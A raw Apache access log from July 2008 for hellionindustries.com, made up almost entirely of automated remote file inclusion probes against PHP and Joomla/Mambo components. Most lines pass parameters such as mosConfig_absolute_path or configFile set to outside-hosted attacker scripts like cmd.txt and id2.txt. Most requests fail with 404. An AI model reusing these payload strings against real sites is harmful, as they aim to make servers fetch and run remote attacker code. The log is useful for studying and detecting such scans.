207.210.115.114 - - [26/Jul/2008:05:24:52 -0700] "GET /logs/access.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:52 -0700] "GET /index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:52 -0700] "GET /index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:52 -0700] "GET /logs/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:52 -0700] "GET /logs/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:24:56 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:24:56 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:24:56 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:02 -0700] "GET /logs/access.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:02 -0700] "GET /index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:02 -0700] "GET /logs/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:06 -0700] "GET /logs/access.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:06 -0700] "GET /index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:06 -0700] "GET /logs/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:08 -0700] "GET /logs/access_080716.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:08 -0700] "GET /logs/access_080716.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:16 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:16 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:18 -0700] "GET /logs/access_080716.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:20 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:20 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:22 -0700] "GET /logs/access_080716.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
58.65.228.5 - - [26/Jul/2008:05:25:26 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:32 -0700] "GET /logs/access.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:32 -0700] "GET /index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:32 -0700] "GET /logs/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:25:34 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:25:34 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
212.227.101.81 - - [26/Jul/2008:05:25:39 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
212.227.101.81 - - [26/Jul/2008:05:25:40 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
212.227.101.81 - - [26/Jul/2008:05:25:40 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:25:48 -0700] "GET /logs/access_080716.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:26:05 -0700] "GET /logs/access.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:26:05 -0700] "GET /index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:26:05 -0700] "GET /logs/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:26:08 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:26:23 -0700] "GET /logs/access_080716.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:26:37 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
207.44.230.33 - - [26/Jul/2008:05:26:40 -0700] "GET //components/com_thopper/inc/contact_type.php?redirhttp://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
194.85.90.172 - - [26/Jul/2008:05:26:43 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
194.85.90.172 - - [26/Jul/2008:05:26:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
89.255.60.6 - - [26/Jul/2008:05:27:12 -0700] "GET /logs/access_080716.log//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
89.255.60.6 - - [26/Jul/2008:05:27:13 -0700] "GET //phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
89.255.60.6 - - [26/Jul/2008:05:27:13 -0700] "GET /logs//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:27:47 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:27:47 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:28:27 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:28:28 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:28:47 -0700] "GET /authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:28:50 -0700] "GET /logs/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:29:00 -0700] "GET /authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:29:05 -0700] "GET /logs/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:18 -0700] "GET /logs/access_080716.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:18 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:18 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:21 -0700] "GET /logs/access_080716.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:21 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:21 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:22 -0700] "GET /logs/access_080716.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:22 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:22 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:26 -0700] "GET /logs/access_080716.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:27 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:27 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:29 -0700] "GET /logs/access_080716.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:29 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:29 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:31 -0700] "GET /logs/access_080716.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:31 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:31 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
193.111.11.7 - - [26/Jul/2008:05:29:36 -0700] "GET /logs/access_080717.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:36 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:37 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:37 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
193.111.11.7 - - [26/Jul/2008:05:29:38 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:38 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:39 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:39 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
193.111.11.7 - - [26/Jul/2008:05:29:40 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:45 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:45 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:45 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:54 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:54 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:55 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:57 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:58 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:58 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:58 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:29:59 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:30:01 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:30:01 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:30:01 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "hellionindustries.com"
212.227.101.81 - - [26/Jul/2008:05:30:16 -0700] "GET /logs/access_080717.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
194.79.75.195 - - [26/Jul/2008:05:30:43 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/marlinarika/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.hellionindustries.com"
194.79.75.195 - - [26/Jul/2008:05:30:43 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/marlinarika/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:30:43 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:30:43 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:31:18 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:31:18 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:31:19 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
213.219.217.44 - - [26/Jul/2008:05:31:21 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "hellionindustries.com"
213.219.217.44 - - [26/Jul/2008:05:31:22 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "hellionindustries.com"
213.219.217.44 - - [26/Jul/2008:05:31:22 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:31:26 -0700] "GET /logs/access_080716.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:31:26 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:31:26 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
93.174.93.224 - - [26/Jul/2008:05:31:28 -0700] "GET /logs/access.log HTTP/1.1" 200 75600 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:31:39 -0700] "GET /logs/access_080717.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:31:53 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:31:53 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:31:53 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "hellionindustries.com"
